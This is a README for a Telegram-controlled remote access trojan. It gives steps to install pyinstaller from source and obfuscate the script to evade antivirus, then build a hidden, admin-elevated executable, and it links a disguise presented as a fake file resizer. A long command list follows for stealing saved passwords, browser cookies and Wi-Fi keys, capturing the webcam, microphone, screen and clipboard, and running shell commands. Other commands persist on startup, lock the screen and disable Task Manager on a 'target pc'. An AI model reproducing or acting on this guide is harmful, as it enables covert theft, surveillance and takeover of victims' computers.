With this tool you can control with YOUR pc remotly using telegram That you need only hand (2 optional) , exe file that you will get from pyinstaller and telegram account
# Register account in telegram
# Create bot with botfather
# Download this project
$ Download pyinstaller from https://github.com/pyinstaller/pyinstaller
# because most antiviruses will detect as virus pyinstaller from original pip version
# if you downloaded pyinstaller from pip like pip install pyinstaller
# Delete that
# also i'm recomending you to install and upgrade setuptools and pip
$ pip install --upgrade setuptools pip
# if you don't do this, problems may arise
# Download requiremets.txt
$ pip install -r requirements.txt
# change bot api in python file to your own bot
$ bot = telebot.TeleBot('your api token')
# !MAIN STEP! obfuscation will help to deceive antiviruses
$ to obfuscate that script copy full code and paste it in https://freecodingtools.org/py-obfuscator
$ https://freecodingtools.org/py-obfuscator
# Of course you can use another obfuscators but i like that obfuscator (this is not an advertisement)
# after downloading pyinstaller run:
$ pyinstaller --onefile --noconsole --uac-admin --hidden-import telebot --hidden-import pyautogui --hidden-import cv2 --hidden-import json --hidden-import base64 --hidden-import sqlite3 --hidden-import win32crypt --hidden-import Cryptodome.Cipher.AES --hidden-import shutil --hidden-import datetime --hidden-import numpy --hidden-import pyaudio --hidden-import wave --hidden-import random --hidden-import browser_cookie3 --hidden-import pyttsx3 Triton_Rat_Release.py
# wait for building exe
$ run exe and bot started!
Download app: https://github.com/WhiteeRabbit/fake_file_resizer/
Download here: https://github.com/WhiteeRabbit/fake_file_resizer/
βοΈ/start - start the program
βοΈ/help - help with commands
π/addstartup - to add autostart
π§π»βπ»/users - show users in pc
π/passwords - show saved passwords in pc
πͺ/robloxcookie - show roblox cookies
πͺͺ/info - to show information about pc ,also location , country, city , ip
π₯οΈ/whoami - to show name of pc
π¬ππ»/textspech 'your text' - your text will sounded in pc
π΅/playsound 'file path' -(first run /upload to upload your music file in pc) your file will sound in pc for ex: /playsound C:\test.mp3
π«/execute - execute shell commands (like terminel emulator in netcat)
π‘οΈ/e 'your command' - also execute shell commands
πΉ/ex 'your command' - use this if you will execute commands with long response
π·/screenshot - to get screenshot
πΉ/webscreen - get screenshot from camera
ποΈ/mic 'time in seconds' - record microphone of pc
β’οΈ/winblocker - my own winlocker
β£οΈ/winblocker2 - if winblocker doesnt work
π/download 'your file' - to download files(for exm: /download C:\test.txt)
ποΈ/upload - to upload file in target pc
π/clipboard - show users clipboard
π¦/webcam - get webcam video
π₯/screenrecord - get screenrecord
π/chrome 'website url' - open website in chrome in target pc
π/edge 'website url' - open website in edge in target pc
π/firefox 'website url' - open website in firefox in target pc
βοΈ/msg 'your message' - send message(messagebox) to target
π£/spam 'your message' - spam your message 10 times but if you will click al lot...
π/wifilist - show saved wifi
π/wifipass 'name of accespoint' - show password of saved wifi
π±οΈ/mousemesstart - start mouse messing
π/mousemesstop - stop mouse messing
πͺ€/mousekill - disable mouse
π/mousestop - enable mouse
π/fullvolume - make full volume
π/volumeplus - make pc volume + 10
π/volumeminus - make pc volume - 10
πͺ¦/disabletaskmgr - disable task manager
π /enabletaskmgr - enable task manager
π§±/wallpaper - change desktop's wallpaper
β¨οΈ/keypress 'your key' - in pc's keyboard will pressed this keys
β¨οΈ/keypresstwo 'your key' 'your key' - in pc's keyboard will pressed this keys
β¨οΈ/keypressthree 'your key' 'your key' 'your key' - in pc's keyboard will pressed this keys
π/tasklist - to show tasks
π§¨/taskkill 'your task' - kill entered task
πΆοΈ/hide - to hide your app
π/unhide - unhide your app
π€/sleep - send windows to sleep
π/shutdown - shutdown pc
ποΈ/restart - restart pc
This project is licensed under the MIT License. For more details, please refer to the LICENSE file.